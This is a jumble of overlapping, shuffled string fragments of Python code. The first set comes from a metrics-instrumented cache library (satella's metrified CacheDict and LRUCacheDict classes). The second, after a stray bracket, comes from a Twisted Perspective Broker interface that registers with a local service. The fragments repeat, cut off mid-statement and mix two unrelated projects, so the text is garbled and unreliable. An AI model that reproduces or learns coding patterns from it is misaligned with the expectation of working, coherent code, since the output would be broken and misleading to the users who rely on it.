import Metric from", "V]): \"\"\" A LRUCacheDict with metrics! :param cache_hits: a counter metric that will", "self.cache_miss = cache_miss self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def", "value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement", "if item in self.in_cache: if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item)", "tp from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V from", "time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] =", "= how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss:", "= how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss", "if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics!", "= how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits", "cache_miss self.cache_hits = cache_hits if entries_waiting is not None: entries_waiting.callable = self.get_queue_length() def", "item): if item in self.in_cache: if self.cache_hits: 
self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return", ":param refreshes: a metric that will be updated with +1 each time there's", "try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter", "be ticked with time value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None,", "else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with", "time there's a cache hit :param cache_miss: a counter metric that will be", "refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions is not", "value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None,", "None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits if entries_waiting is", "time value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None,", "item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class", "__init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int =", "cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item): if", 
"self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss:", "= cache_miss self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self):", "= value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter =", "miss :param refreshes: a metric that will be updated with +1 each time", "MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics! :param cache_hits: a counter metric that", "*args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] = None,", "= None, evictions: tp.Optional[Metric] = None, **kwargs): if refreshes: old_value_getter = value_getter def", "super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric]", "__init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss:", "A LRUCacheDict with metrics! 
:param cache_hits: a counter metric that will be updated", "cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes:", "tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss", "how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss", "as tp from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V", "<reponame>piotrmaslanka/satella import logging import time import typing as tp from satella.coding.structures import CacheDict,", "\"\"\" A CacheDict with metrics! :param cache_hits: a counter metric that will be", "refreshes: a metric that will be updated with +1 each time there's a", "MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics! :param", "value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes:", "**kwargs): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if", "with metrics! 
:param cache_hits: a counter metric that will be updated with +1", "a metric that will be ticked with time value_getter took \"\"\" def __init__(self,", ":param cache_hits: a counter metric that will be updated with +1 each time", "tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item)", "self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def", "old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter", "self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A", "value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory)" ]
[]
[ "failed) #d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\",", "factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else: d", "from comlocal.core.Com import Com class ComIFace (object): def __init__(self, name, port): self.readCB =", "= obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d if self.obj is None:", "(object): def __init__(self, name, port): self.readCB = None self._comiface = None self.name =", "obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if self.obj is None:", "d.addCallback(lambda res: port.stopListening()) return d def write(self, msg, dest): message = {'msg':msg,'dest':dest} return", "d def unregister(self): def regAck(result): #assert 'success' in result['result'] self.iface.registered = False def", "msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command =", "d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doWrite(self, msg): def writeAck(result):", "'success' in result['result'] self.iface.registered = True def failed(reason): print reason def connected(obj): self.obj", "self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd', cmd)", "self.obj = obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed)", "obj.broker.transport.loseConnection() # return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return", "from twisted.internet import reactor from comlocal.core.Com import Com class ComIFace 
(object): def __init__(self,", "return result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj = obj def", "print reason reason.printTraceback() def connected(obj): self.obj = obj # def closeAndReturn (result): #", "d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if self.obj is None: factory =", "d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory = pb.PBClientFactory()", "None self.name = name self.port = port def start(self): self._comiface = _ComIFace(self) self.tcpPort", "obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result:", "obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory", "d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doWrite(self,", "#obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d", "reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def stop(self):", "res: port.stopListening()) return d def write(self, msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message)", "def closeAndReturn (result): # obj.broker.transport.loseConnection() # return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck,", "factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def unregister(self): def regAck(result):", "def closeAndReturn (result): #obj.broker.transport.loseConnection() return result d = 
obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn,", "pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj)", "def unregister(self): def regAck(result): #assert 'success' in result['result'] self.iface.registered = False def failed(reason):", "def failed(reason): print reason def connected(obj): self.obj = obj regPacket = {'cmd': 'unreg_app',", "factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def", "d = connected(self.obj) return d def unregister(self): def regAck(result): #assert 'success' in result['result']", "**kwargs): command = {'cmd':cmd} for key in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command)", "d.addCallback(lambda res: self._comiface.register()) return d def stop(self): d = self._comiface.unregister() port, self.tcpPort =", "msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory =", "= kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface = iface self.port", "def start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister()", "{'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return", "def connected(obj): self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return result d =", "result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj", "d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) 
#d.addCallbacks(closeAndReturn, failed) return d if self.obj is", "= None self._comiface = None self.name = name self.port = port def start(self):", "in result['result'] self.iface.registered = True def failed(reason): print reason def connected(obj): self.obj =", "name self.port = port def start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface),", "#print self.success(str(result)) return result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj =", "def connected(obj): self.obj = obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd',", "def failed(reason): print reason reason.printTraceback() def connected(obj): self.obj = obj # def closeAndReturn", "failed(reason): print reason reason.printTraceback() def connected(obj): self.obj = obj # def closeAndReturn (result):", "return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d if", "= obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck,", "= _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register())", "self.obj = obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed)", "d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj is", "cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory =", "= connected(self.obj) return d def unregister(self): def regAck(result): #assert 'success' in result['result'] self.iface.registered", "d 
if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d =", "connected(obj): self.obj = obj # def closeAndReturn (result): # obj.broker.transport.loseConnection() # return result", "twisted.spread import pb from twisted.internet import reactor from comlocal.core.Com import Com class ComIFace", "obj # def closeAndReturn (result): # obj.broker.transport.loseConnection() # return result d = obj.callRemote('write',", "failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory)", "failed(reason): print reason def connected(obj): self.obj = obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port}", "__init__(self, name, port): self.readCB = None self._comiface = None self.name = name self.port", "cmd, **kwargs): command = {'cmd':cmd} for key in kwargs: command[key] = kwargs[key] return", "d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def remote_read(self,", "'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d", "'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if", "obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result:", "def stop(self): d = self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening())", "= obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda", "return d def stop(self): 
d = self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda", "return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command = {'cmd':cmd} for key in kwargs:", "'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d", "reason.printTraceback() def connected(obj): self.obj = obj # def closeAndReturn (result): # obj.broker.transport.loseConnection() #", "self._comiface.register()) return d def stop(self): d = self._comiface.unregister() port, self.tcpPort = self.tcpPort, None", "= obj # def closeAndReturn (result): # obj.broker.transport.loseConnection() # return result d =", "self.success(str(result)) return result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj = obj", "closeAndReturn (result): #obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed)", "command = {'cmd':cmd} for key in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class", "def cmd(self, cmd, **kwargs): command = {'cmd':cmd} for key in kwargs: command[key] =", "result def failed(reason): print reason reason.printTraceback() def connected(obj): self.obj = obj # def", "unregister(self): def regAck(result): #assert 'success' in result['result'] self.iface.registered = False def failed(reason): print", "failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection()", "self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res:", "= connected(self.obj) return d def doCmd(self,cmd): 
def writeAck(result): #print self.success(str(result)) return result def", "= obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda", "connected(self.obj) return d def unregister(self): def regAck(result): #assert 'success' in result['result'] self.iface.registered =", "= False def failed(reason): print reason def connected(obj): self.obj = obj regPacket =", "d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def stop(self): d = self._comiface.unregister()", "self.iface.registered = False def failed(reason): print reason def connected(obj): self.obj = obj regPacket", "= self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d def write(self, msg, dest): message", "def __init__(self, iface): self.iface = iface self.port = self.iface.port self.obj = None def", "self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected,", "d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def unregister(self):", "print reason def connected(obj): self.obj = obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d", "return d def doWrite(self, msg): def writeAck(result): return result def failed(reason): print reason", "self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d def write(self,", "cmd(self, cmd, **kwargs): command = {'cmd':cmd} for key in kwargs: command[key] = kwargs[key]", "= {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command = {'cmd':cmd} for key", "writeAck(result): #print self.success(str(result)) return result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def 
connected(obj): self.obj", "d def doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return result def failed(reason): log.msg(self.failure (str(reason)))", "class _ComIFace(pb.Root): def __init__(self, iface): self.iface = iface self.port = self.iface.port self.obj =", "iface): self.iface = iface self.port = self.iface.port self.obj = None def register(self): def", "def write(self, msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs):", "regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(),", "return result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if", "d = connected(self.obj) return d def doWrite(self, msg): def writeAck(result): return result def", "result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d if self.obj", "dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command = {'cmd':cmd}", "d def stop(self): d = self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda res:", "def regAck(result): assert 'success' in result['result'] self.iface.registered = True def failed(reason): print reason", "def failed(reason): print reason def connected(obj): self.obj = obj regPacket = {'cmd': 'reg_app',", "#d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort,", "d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doCmd(self,cmd): def writeAck(result): #print", "self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def stop(self): d = 
self._comiface.unregister() port, self.tcpPort", "self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface = iface self.port = self.iface.port self.obj", "= connected(self.obj) return d def doWrite(self, msg): def writeAck(result): return result def failed(reason):", "= name self.port = port def start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port,", "= factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doCmd(self,cmd): def", "regAck(result): #assert 'success' in result['result'] self.iface.registered = False def failed(reason): print reason def", "write(self, msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command", "msg): def writeAck(result): return result def failed(reason): print reason reason.printTraceback() def connected(obj): self.obj", "__init__(self, iface): self.iface = iface self.port = self.iface.port self.obj = None def register(self):", "= factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def remote_read(self, message):", "= {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed)", "True def failed(reason): print reason def connected(obj): self.obj = obj regPacket = {'cmd':", "= self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d def", "d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def unregister(self): def regAck(result): #assert", "result['result'] self.iface.registered = False def failed(reason): print reason def connected(obj): self.obj = obj", "twisted.internet import reactor from comlocal.core.Com import Com class ComIFace (object): def __init__(self, name,", 
"self.iface = iface self.port = self.iface.port self.obj = None def register(self): def regAck(result):", "def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj = obj def closeAndReturn (result):", "failed(reason): print reason def connected(obj): self.obj = obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port}", "self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command = {'cmd':cmd} for key in kwargs: command[key]", "#assert 'success' in result['result'] self.iface.registered = False def failed(reason): print reason def connected(obj):", "self.readCB = None self._comiface = None self.name = name self.port = port def", "return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface = iface self.port = self.iface.port", "import reactor from comlocal.core.Com import Com class ComIFace (object): def __init__(self, name, port):", "_ComIFace(pb.Root): def __init__(self, iface): self.iface = iface self.port = self.iface.port self.obj = None", "port def start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d =", "= factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doWrite(self, msg):", "pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def stop(self): d", "Com class ComIFace (object): def __init__(self, name, port): self.readCB = None self._comiface =", "return d def unregister(self): def regAck(result): #assert 'success' in result['result'] self.iface.registered = False", "d def doWrite(self, msg): def writeAck(result): return result def failed(reason): print reason reason.printTraceback()", "= None self.name = name self.port = port def start(self): self._comiface = _ComIFace(self)", "port, 
self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d def write(self, msg,", "def connected(obj): self.obj = obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd',", "d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doCmd(self,cmd):", "def connected(obj): self.obj = obj # def closeAndReturn (result): # obj.broker.transport.loseConnection() # return", "else: d = connected(self.obj) return d def doWrite(self, msg): def writeAck(result): return result", "result['result'] self.iface.registered = True def failed(reason): print reason def connected(obj): self.obj = obj", "'success' in result['result'] self.iface.registered = False def failed(reason): print reason def connected(obj): self.obj", "# return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d", "= port def start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d", "ComIFace (object): def __init__(self, name, port): self.readCB = None self._comiface = None self.name", "self.name = name self.port = port def start(self): self._comiface = _ComIFace(self) self.tcpPort =", "doWrite(self, msg): def writeAck(result): return result def failed(reason): print reason reason.printTraceback() def connected(obj):", "_ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return", "= {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed)", "obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return 
result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed)", "self.port = port def start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1')", "def regAck(result): #assert 'success' in result['result'] self.iface.registered = False def failed(reason): print reason", "import Com class ComIFace (object): def __init__(self, name, port): self.readCB = None self._comiface", "factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doWrite(self, msg): def", "iface self.port = self.iface.port self.obj = None def register(self): def regAck(result): assert 'success'", "for key in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self,", "self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d def write(self, msg, dest): message =", "d def write(self, msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd,", "d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if self.obj", "import pb from twisted.internet import reactor from comlocal.core.Com import Com class ComIFace (object):", "comlocal.core.Com import Com class ComIFace (object): def __init__(self, name, port): self.readCB = None", "def register(self): def regAck(result): assert 'success' in result['result'] self.iface.registered = True def failed(reason):", "if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject()", "regAck(result): assert 'success' in result['result'] self.iface.registered = True def failed(reason): print reason def", "def __init__(self, name, port): self.readCB = None self._comiface = None self.name = name", "None self._comiface = None self.name = name 
self.port = port def start(self): self._comiface", "reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return", "reason def connected(obj): self.obj = obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d =", "register(self): def regAck(result): assert 'success' in result['result'] self.iface.registered = True def failed(reason): print", "obj.broker.transport.loseConnection(), failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort,", "start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda", "self.obj = obj # def closeAndReturn (result): # obj.broker.transport.loseConnection() # return result d", "= factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def unregister(self): def", "return d def doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return result def failed(reason): log.msg(self.failure", "reactor from comlocal.core.Com import Com class ComIFace (object): def __init__(self, name, port): self.readCB", "result: obj.broker.transport.loseConnection(), failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\",", "= self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def stop(self): d = self._comiface.unregister() port,", "self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d def write(self, msg, dest):", "self.iface.registered = True def failed(reason): print reason def connected(obj): self.obj = obj regPacket", "else: d = connected(self.obj) return d def unregister(self): def regAck(result): #assert 'success' in", "doCmd(self,cmd): def writeAck(result): #print 
self.success(str(result)) return result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def", "Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d", "name, port): self.readCB = None self._comiface = None self.name = name self.port =", "{'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command = {'cmd':cmd} for key in", "{'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return", "port): self.readCB = None self._comiface = None self.name = name self.port = port", "connected(obj): self.obj = obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket)", "result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj = obj def closeAndReturn", "self._comiface = None self.name = name self.port = port def start(self): self._comiface =", "= self.iface.port self.obj = None def register(self): def regAck(result): assert 'success' in result['result']", "d = connected(self.obj) return d def doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return result", "failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\",", "stop(self): d = self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return", "None d.addCallback(lambda res: port.stopListening()) return d def write(self, msg, dest): message = {'msg':msg,'dest':dest}", "= None def register(self): def regAck(result): 